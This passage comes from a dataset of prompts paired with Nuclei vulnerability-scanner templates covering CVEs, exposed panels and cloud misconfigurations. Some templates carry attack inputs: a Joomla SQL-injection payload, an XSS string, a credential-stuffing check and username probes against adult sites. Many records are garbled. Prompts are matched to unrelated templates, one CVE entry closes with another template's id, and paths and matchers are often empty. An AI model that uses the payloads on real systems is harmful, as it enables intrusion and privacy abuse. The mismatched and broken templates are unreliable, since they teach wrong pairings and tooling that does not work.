(CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: kafka-topics-ui\n\ninfo:\n name: Apache Kafka Topics Panel - Detect\n author: pdteam,righettod\n severity: info\n description: Apache Kafka Topics panel was detected.\n tags: panel,kafka,apache,detect,provectus,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/info\" \n matchers:\n - type: word\n words:\n - \"Kafka Topics UI - Browse Kafka Data\" \n - \"UI for Apache Kafka\" \n - \"github.com/provectus/kafka-ui\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: PgSQL Security Checks", "input": "Title: PgSQL Security Checks\nSummary: PgSQL Security Checks. A simple workflow that runs all PgSQL related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pgsql-workflow\n\ninfo:\n name: PgSQL Security Checks\n author: pussycat0x\n severity: info\n description: A simple workflow that runs all PgSQL related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "pgsql-workflow"} {"instruction": "Generate a Nuclei template for CVE-2017-8917", "input": "Title: SQL Injection in joomla joomla\\!\nSummary: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: joomla joomla\\!\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-8917\n\ninfo:\n name: Joomla! <3.7.1 - SQL Injection\n author: princechaddha\n severity: critical\n description: Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n tags: cve2017,cve,joomla,sqli,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)\" \n matchers:\n - type: word\n words:\n - \"{{md5(num)}}\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2017-8917"} {"instruction": "Generate a Nuclei template for: Laragon - phpinfo Disclosure", "input": "Title: Laragon - phpinfo Disclosure\nSummary: Laragon - phpinfo Disclosure. Laragon phpinfo file was exposed.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: laragon-phpinfo\n\ninfo:\n name: Laragon - phpinfo Disclosure\n author: DhiyaneshDk\n severity: low\n description: Laragon phpinfo file was exposed.\n tags: laragon,exposure,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?q=info\" \n matchers:\n - type: word\n words:\n - \"PHP Extension\" \n - \"PHP Version\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "laragon-phpinfo"} {"instruction": "Generate a Nuclei template for: Internal IP Disclosure", "input": "Title: Internal IP Disclosure\nSummary: Internal IP Disclosure. Tags: misconfig, disclosure, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: internal-ip-disclosure\n\ninfo:\n name: Internal IP Disclosure\n author: WillD96\n severity: info\n description: Internal IP Disclosure\n tags: misconfig,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: location\n - type: dsl\n - type: status\n status:\n - 301", "category": "generic", "severity": "info", "id": "internal-ip-disclosure"} {"instruction": "Generate a Nuclei template for: Joplin Server Login - Panel", "input": "Title: Joplin Server Login - Panel\nSummary: Joplin Server Login - Panel. Joplin Server login panel detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: joplin-panel\n\ninfo:\n name: Joplin Server Login - Panel\n author: pussycat0x\n severity: info\n description: Joplin Server login panel detected.\n tags: panel,joplin,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"Joplin Server - Login\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "joplin-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: webview-addjavascript-interface\n\ninfo:\n name: Android WebView Add Javascript Interface - Detect\n author: gaurang\n severity: info\n description: Android WebView Add Javascript interface usage was detected.\n tags: android,file,webview\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-0147", "input": "Title: Cross-Site Scripting (XSS) in cookieinformation wp-gdpr-compliance\nSummary: The Cookie Information | Free GDPR Consent Solution WordPress plugin before 2.0.8 does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: cookieinformation wp-gdpr-compliance\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0147\n\ninfo:\n name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting\n author: 8arthur\n severity: medium\n description: WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2022,cve,wordpress,xss,wp,authenticated,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'\" \n - \"toplevel_page_wp-gdpr-compliance\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0147"} {"instruction": "Generate a Nuclei template for: Rsync Version - Detect", "input": "Title: Rsync Version - Detect\nSummary: Rsync Version - Detect. Identify the Version of the Rsync Protocol\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: rsync-version\n\ninfo:\n name: Rsync Version - Detect\n author: DhiyaneshDK\n severity: info\n description: Identify the Version of the Rsync Protocol\n tags: js,network,rsync,enum,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "rsync-version"} {"instruction": "Generate a Nuclei template for: Azure API Management Weak TLS Configured", "input": "Title: Azure API Management Weak TLS Configured\nSummary: Azure API Management Weak TLS Configured. Ensure that your Azure API Management API gateways are not configured to use weak and deprecated TLS protocols such as TLS 1.0 and TLS 1.1. Using outdated TLS versions can expose your APIs to exploits targeting flaws in these older protocols. Ensure API gateways use the latest supported TLS version.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-apim-tls-config-weak\n\ninfo:\n name: Azure API Management Weak TLS Configured\n author: princechaddha\n severity: medium\n description: Ensure that your Azure API Management API gateways are not configured to use weak and deprecated TLS protocols such as TLS 1.0 and TLS 1.1. Using outdated TLS versions can expose your APIs to exploits targeting flaws in these older protocols. Ensure API gateways use the latest supported TLS version.\n tags: cloud,devops,azure,microsoft,api-management,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-apim-tls-config-weak"} {"instruction": "Generate a Nuclei template for: RDS Auto Minor Version Upgrade - Disabled", "input": "Title: RDS Auto Minor Version Upgrade - Disabled\nSummary: RDS Auto Minor Version Upgrade - Disabled. Ensure that your Amazon RDS database instances have the Auto Minor Version Upgrade flag enabled in order to receive automatically minor engine upgrades during the specified maintenance window.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: rds-auto-minor-upgrade-disabled\n\ninfo:\n name: RDS Auto Minor Version Upgrade - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure that your Amazon RDS database instances have the Auto Minor Version Upgrade flag enabled in order to receive automatically minor engine upgrades during the specified maintenance window.\n tags: cloud,devops,aws,amazon,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "rds-auto-minor-upgrade-disabled"} {"instruction": "Generate a Nuclei template for CVE-2023-42793", "input": "Title: Vulnerability (CWE-288) in jetbrains teamcity\nSummary: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\nVulnerability Type: Vulnerability (CWE-288)\nSeverity: critical\nAffected Products: jetbrains teamcity\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-42793\n\ninfo:\n name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "barracuda-message-panel"} {"instruction": "Generate a Nuclei template for: GKE Clusters Without Metadata Server Enabled", "input": "Title: GKE Clusters Without Metadata Server Enabled\nSummary: GKE Clusters Without Metadata Server Enabled. Ensure that GKE Metadata Server is enabled for your Google Kubernetes Engine (GKE) cluster nodes to enhance security by restricting workload access to sensitive instance information. The GKE Metadata Server feature requires Workload Identity for improved authentication and authorization.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-gke-metadata-server-disabled\n\ninfo:\n name: GKE Clusters Without Metadata Server Enabled\n author: princechaddha\n severity: medium\n description: Ensure that GKE Metadata Server is enabled for your Google Kubernetes Engine (GKE) cluster nodes to enhance security by restricting workload access to sensitive instance information. The GKE Metadata Server feature requires Workload Identity for improved authentication and authorization.\n tags: cloud,devops,gcp,gcloud,gke,kubernetes,security,metadata,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-gke-metadata-server-disabled"} {"instruction": "Generate a Nuclei template for: AgileCRM Takeover Detection", "input": "Title: AgileCRM Takeover Detection\nSummary: AgileCRM Takeover Detection. agilecrm subdomain takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: agilecrm-takeover\n\ninfo:\n name: AgileCRM Takeover Detection\n author: pdteam\n severity: high\n description: agilecrm subdomain takeover was detected.\n tags: takeover,agilecrm,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Sorry, this page is no longer available.\"", "category": "generic", "severity": "high", "id": "agilecrm-takeover"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: piratebay\n\ninfo:\n name: Piratebay Username Information - Detect\n author: philippedelteil\n severity: info\n description: Piratebay Username Information - Detect\n tags: osint,osint-p2p,piratebay,headless,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: bdsmsingles\n\ninfo:\n name: Bdsmsingles User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Bdsmsingles user name information check was conducted.\n tags: osint,osint-porn,bdsmsingles,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.bdsmsingles.com/members/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Profile\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: GLPI Status Domain Disclosure", "input": "Title: GLPI Status Domain Disclosure\nSummary: GLPI Status Domain Disclosure. Tags: glpi, exposure, status\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: glpi-status-domain-disclosure\n\ninfo:\n name: GLPI Status Domain Disclosure\n author: dogasantos\n severity: info\n description: GLPI Status Domain Disclosure\n tags: glpi,exposure,status,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/status.php\" \n - \"{{BaseURL}}/glpi/status.php\" \n - \"{{BaseURL}}/glpi2/status.php\" \n matchers:\n - type: word\n words:\n - \"GLPI_\" \n - \"LDAP server\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "glpi-status-domain-disclosure"} {"instruction": "Generate a Nuclei template for: visual studio code phishing Detection", "input": "Title: visual studio code phishing Detection\nSummary: visual studio code phishing Detection. A visual studio code phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: visual-studio-code-phish\n\ninfo:\n name: visual studio code phishing Detection\n author: rxerium\n severity: info\n description: A visual studio code phishing website was detected\n tags: phishing,visual-studio-code,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Visual Studio Code is a code editor redefined and optimized for building and debugging modern web and cloud applications. Visual Studio Code is free and available on your favorite platform - Linux, macOS, and Windows.\" \n - \"Visual Studio Code - Code Editing. Redefined\" \n condition: and\n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "visual-studio-code-phish"} {"instruction": "Generate a Nuclei template for CVE-2024-41955", "input": "Title: Vulnerability (CWE-601) in opensecurity mobile_security_framework\nSummary: Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view. Update to MobSF v4.0.5.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: opensecurity mobile_security_framework\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-41955\n\ninfo:\n name: Open Redirect in Login Redirect - MobSF\n author: Farish\n severity: medium\n description: Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.\n tags: cve,cve2024,open-redirect,mobsf,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: header_2", "category": "cve", "severity": "medium", "id": "CVE-2024-41955"} {"instruction": "Generate a Nuclei template for: Nocobase - Config", "input": "Title: Nocobase - Config\nSummary: Nocobase - Config. The path /api/v1/db/meta/nocodb/info of the NocoBase web application was exposed, revealing internal information. NocoBase was an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: nocobase-config\n\ninfo:\n name: Nocobase - Config\n author: icarot\n severity: medium\n description: The path /api/v1/db/meta/nocodb/info of the NocoBase web application was exposed, revealing internal information. NocoBase was an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.\n tags: nocobase,config,exposed,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"authType\":\" \n - \"\"env\":\" \n - \"\"version\":\" \n - \"\"ncSiteUrl\":\" \n - \"\"mainSubDomain\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "nocobase-config"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: aircube-login\n\ninfo:\n name: airCube Login - Detect\n author: DhiyaneshDk\n severity: info\n description: airCube login panel was detected.\n tags: panel,aircube,ubiquiti,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>airCube\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: ExchangeRate-API API Test", "input": "Title: ExchangeRate-API API Test\nSummary: ExchangeRate-API API Test. Free currency conversion\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-exchangerateapi\n\ninfo:\n name: ExchangeRate-API API Test\n author: daffainfo\n severity: info\n description: Free currency conversion\n tags: token-spray,exchangerateapi\n\nhttp:\n - method: GET\n path:\n - \"https://v6.exchangerate-api.com/v6/{{token}}/latest/USD\" \n matchers:\n - type: word\n words:\n - \"\"time_next_update_utc\"\" \n - \"\"base_code\"\" \n - \"\"conversion_rates\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-exchangerateapi"} {"instruction": "Generate a Nuclei template for CVE-2022-24112", "input": "Title: Vulnerability (CWE-290) in apache apisix\nSummary: An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.\nVulnerability Type: Vulnerability (CWE-290)\nSeverity: critical\nAffected Products: apache apisix\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24112\n\ninfo:\n name: Apache APISIX - Remote Code Execution\n author: Mr-xn\n severity: critical\n description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.\n tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"reason\":\"OK\"\" \n - \"\"status\":200\" \n part: body_1\n condition: and\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-24112"} {"instruction": "Generate a Nuclei template for: TrueNAS API Key (WebSocket)", "input": "Title: TrueNAS API Key (WebSocket)\nSummary: TrueNAS API Key (WebSocket). Tags: truenas, keys, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: truenas-api\n\ninfo:\n name: TrueNAS API Key (WebSocket)\n author: DhiyaneshDK\n severity: info\n description: TrueNAS API Key (WebSocket)\n tags: truenas,keys,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "truenas-api"} {"instruction": "Generate a Nuclei template for: gitea.com Login Check", "input": "Title: gitea.com Login Check\nSummary: gitea.com Login Check. Checks for a valid gitea account.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: gitea-login-check\n\ninfo:\n name: gitea.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid gitea account.\n tags: cloud,creds-stuffing,login-check,gitea,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Location: /\" \n part: header\n - type: status\n status:\n - 303", "category": "generic", "severity": "critical", "id": "gitea-login-check"} {"instruction": "Generate a Nuclei template for: Adobe ColdFusion Security Checks", "input": "Title: Adobe ColdFusion Security Checks\nSummary: Adobe ColdFusion Security Checks. A simple workflow that runs all Adobe ColdFusion related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: coldfusion-workflow\n\ninfo:\n name: Adobe ColdFusion Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Adobe ColdFusion related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "coldfusion-workflow"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: veeam-backup-azure-panel\n\ninfo:\n name: Veeam Backup for Microsoft Azure Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Veeam Backup for Microsoft Azure panel was detected.\n tags: azure,panel,backup,veeam,microsoft,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Veeam Backup for Microsoft Azure\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Deimos C2 - Detect", "input": "Title: Deimos C2 - Detect\nSummary: Deimos C2 - Detect. DeimosC2 is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised. DeimosC2 server and agents works on, and has been tested on, Windows, Darwin, and Linux.It is entirely written in Golang with a front end written in Vue.js.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: deimos-c2\n\ninfo:\n name: Deimos C2 - Detect\n author: pussycat0x\n severity: info\n description: DeimosC2 is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised. DeimosC2 server and agents works on, and has been tested on, Windows, Darwin, and Linux.It is entirely written in Golang with a front end written in Vue.js.\n tags: c2,ir,osint,deimosc2,panel,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"Deimos C2\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "deimos-c2"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: vmware-vcenter-lfi\n\ninfo:\n name: VMware vCenter - Local File Inclusion\n author: dwisiswant0\n severity: high\n description: VMware vCenter is vulnerable to local file inclusion.\n tags: vmware,lfi,vcenter,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template for: Confluence Installation Page - Exposure", "input": "Title: Confluence Installation Page - Exposure\nSummary: Confluence Installation Page - Exposure. Confluence is susceptible to the Installation page exposure due to misconfiguration.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: confluence-installer\n\ninfo:\n name: Confluence Installation Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Confluence is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,exposure,install,confluence,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup/setupcluster-start.action\" \n matchers:\n - type: word\n words:\n - \"Choose your deployment type - Confluence\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "confluence-installer"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - iTunes", "input": "Title: Content-Security-Policy Bypass - iTunes\nSummary: Content-Security-Policy Bypass - iTunes. Tags: xss, csp-bypass, itunes\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: itunes-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - iTunes\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - iTunes\n tags: xss,csp-bypass,itunes,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"apple.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "itunes-csp-bypass"} {"instruction": "Generate a Nuclei template for: Kubelet Scan", "input": "Title: Kubelet Scan\nSummary: Kubelet Scan. Scans for kubelet pods. Tags: tech, k8s, kubernetes\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kubelet-pods\n\ninfo:\n name: Kubelet Scan\n author: sharath\n severity: info\n description: Scans for kubelet pods\n tags: tech,k8s,kubernetes,devops,kubelet,pods,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pods\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"PodList\":\" \n - \"\"items\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "kubelet-pods"} {"instruction": "Generate a Nuclei template for: Azure Blob Storage Soft Delete Not Enabled", "input": "Title: Azure Blob Storage Soft Delete Not Enabled\nSummary: Azure Blob Storage Soft Delete Not Enabled. Ensure that Soft Delete feature is enabled for all your Microsoft Azure Storage blob objects (blobs and snapshots). Soft Delete enables you to save and recover blob data in case your Azure Storage blobs or blob snapshots are deleted. This extra layer of protection also extends to the Microsoft Azure blob data that is erased as the result of an overwrite operation. With Soft Delete feature enabled, when blob objects are deleted, they are transitioned to\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-blob-soft-delete-disabled\n\ninfo:\n name: Azure Blob Storage Soft Delete Not Enabled\n author: princechaddha\n severity: medium\n description: Ensure that Soft Delete feature is enabled for all your Microsoft Azure Storage blob objects (blobs and snapshots). Soft Delete enables you to save and recover blob data in case your Azure Storage blobs or blob snapshots are deleted. This extra layer of protection also extends to the Microsoft Azure blob data that is erased as the result of an overwrite operation. With Soft Delete feature enabled, when blob objects are deleted, they are transitioned to a soft deleted state instead of being permanently erased. When blob objects are overwritten, soft deleted snapshots are created to save the state of the overwritten blob data.\n tags: cloud,devops,azure,microsoft,blob-storage,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-blob-soft-delete-disabled"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: adultism\n\ninfo:\n name: Adultism User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Adultism user name information check was conducted.\n tags: osint,osint-porn,adultism,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.adultism.com/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"static/r-1OqQ4o/css/www/main.css\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Payara Server Default Page", "input": "Title: Payara Server Default Page\nSummary: Payara Server Default Page. Tags: tech, payara, 